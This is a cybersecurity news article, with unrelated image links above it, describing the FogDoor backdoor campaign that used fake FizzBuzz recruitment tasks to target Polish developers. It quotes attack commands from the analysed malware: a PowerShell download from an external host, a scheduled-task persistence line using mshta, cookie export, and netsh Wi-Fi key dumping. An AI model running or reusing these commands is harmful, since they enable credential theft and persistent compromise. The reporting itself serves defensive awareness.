![Apple to Avoid EU Fine Over Browser Choice Screen [Report]](https://www.iclarified.com/images/news/96813/96813/96813-640.jpg)
![iOS 18.4 Release Candidate comes bundled with over 50 new changes and features [Video]](https://i0.wp.com/9to5mac.com/wp-content/uploads/sites/6/2025/03/iOS-18.4-Release-Candidate-Visual-Intelligence-Action-Button-iPhone-16e.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
-xl-xl.jpg)
_alon_harel_Alamy.jpg?#)
![[The AI Show Episode 140]: New AGI Warnings, OpenAI Suggests Government Policy, Sam Altman Teases Creative Writing Model, Claude Web Search & Apple’s AI Woes](https://www.marketingaiinstitute.com/hubfs/ep%20140%20cover.png)
![[The AI Show Episode 139]: The Government Knows AGI Is Coming, Superintelligence Strategy, OpenAI’s $20,000 Per Month Agents & Top 100 Gen AI Apps](https://www.marketingaiinstitute.com/hubfs/ep%20139%20cover-2.png)
.png?width=1920&height=1920&fit=bounds&quality=80&format=jpg&auto=webp#)
.png?width=1920&height=1920&fit=bounds&quality=80&format=jpg&auto=webp#)
Developers Beware! Fake Coding Challenges Will Deploy FogDoor on Your System
A sophisticated malware campaign targeting software developers has emerged, leveraging fake coding challenges to infiltrate systems with a stealthy backdoor dubbed FogDoor. First identified in March 2025, this threat specifically targets Polish-speaking developers and job seekers through socially engineered GitHub repositories masquerading as technical recruitment assessments. The malware’s multi-stage infection chain bypasses conventional security measures […] The post Developers Beware! Fake Coding Challenges Will Deploy FogDoor on Your System appeared first on Cyber Security News.
A sophisticated malware campaign targeting software developers has emerged, leveraging fake coding challenges to infiltrate systems with a stealthy backdoor dubbed FogDoor.
First identified in March 2025, this threat specifically targets Polish-speaking developers and job seekers through socially engineered GitHub repositories masquerading as technical recruitment assessments.
The malware’s multi-stage infection chain bypasses conventional security measures by exploiting developers’ familiarity with coding exercises, weaponizing their trust in industry-standard interview practices like the FizzBuzz test.
The attack begins with a GitHub repository named “FizzBuzz” under the account “Rekrutacja-JS” (Polish for “Recruitment-JS”), hosting an ISO file labeled “Zadanie rekrutacyjne.iso” (“Recruitment Task”).
This file contains a flawed JavaScript FizzBuzz implementation and a malicious Windows shortcut (README.lnk).
When executed, the shortcut triggers a PowerShell script that deploys FogDoor, establishing persistence, exfiltrating sensitive data, and enabling remote command execution.
Cyble Research and Intelligence Labs (CRIL) identified this campaign on March 10, 2025, noting its precision in geofencing attacks to Poland and nearby regions with Polish-speaking populations.
FogDoor distinguishes itself through its evasion-centric architecture.
Instead of traditional command-and-control (C&C) servers, it retrieves instructions from a social media profile on bark.lgbt via API calls and uses ephemeral webhook services like webhookbin.net for data exfiltration.
This approach complicates attribution and infrastructure takedowns. The malware’s payload, SkyWatchWeather.exe, mimics legitimate software while systematically harvesting browser cookies, Wi-Fi credentials, and system metadata.
Infection Mechanism and Execution Flow
The attack’s success hinges on its exploitation of developer workflows.
.webp)
Upon mounting the ISO file, victims encounter FizzBuzz.js—a purposefully defective script designed to prompt debugging—and README.lnk, disguised as a documentation file.
.webp)
Executing the LNK file launches a PowerShell script (SHA-256: 33bc5fa9798219ba6d4e31f91ec23982596c409e0fd73e2c0c33c70538b7ec83) that orchestrates the infection:-
$url = "hxxps://files.catbox.moe/umh6no.txt"
Invoke-WebRequest -Uri $url -OutFile "$env:USERPROFILE\README.txt"
Start-Process notepad.exe "$env:USERPROFILE\README.txt"This script first deploys a decoy README.txt containing faux debugging instructions to avoid suspicion.
Concurrently, it downloads SkyWatchWeather.exe from a compromised GitHub repository, saving it to C:\Users\Public\Downloads.
A scheduled task named “Weather Widget” ensures persistence, reactivating the malware every two minutes via:-
schtasks /create /tn "Weather Widget" /tr "mshta vbscript:Execute(...)" /sc minute /mo 2FogDoor then initiates geolocation checks using wttr.in’s weather API, terminating execution if the victim’s country isn’t Poland.
.webp)
For verified targets, it accesses the TA’s social media profile via hxxps://bark.lgbt/api/v1/accounts/lookup?acct=Pawsitive Vibes to retrieve embedded commands.
These instructions execute via:-
Network.getAllCookies().then(cookies => { chrome.cookies.export(cookies); });This remote debugging technique extracts Chrome cookies, while Firefox credentials are copied from %AppData%\Roaming\Mozilla\Firefox\Profiles.
Wi-Fi passwords are harvested using:-
netsh wlan show profile name="$name" key=clear >> %userprofile%\data\wifi.txtStolen data is compressed into data.zip and uploaded to filebin.net using a MachineGUID-derived URL, followed by a cleanup routine that deletes staging files and temporary webhook traces.
Cyble analysts emphasize that this multi-layered approach—combining social engineering, geofencing, and ephemeral C&C channels—enables FogDoor to operate undetected across development environments.
As FogDoor’s operators expand their tactics to include invoice-themed lures, organizations must prioritize security training and deploy behavioral analytics to counter such socially engineered threats.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
The post Developers Beware! Fake Coding Challenges Will Deploy FogDoor on Your System appeared first on Cyber Security News.
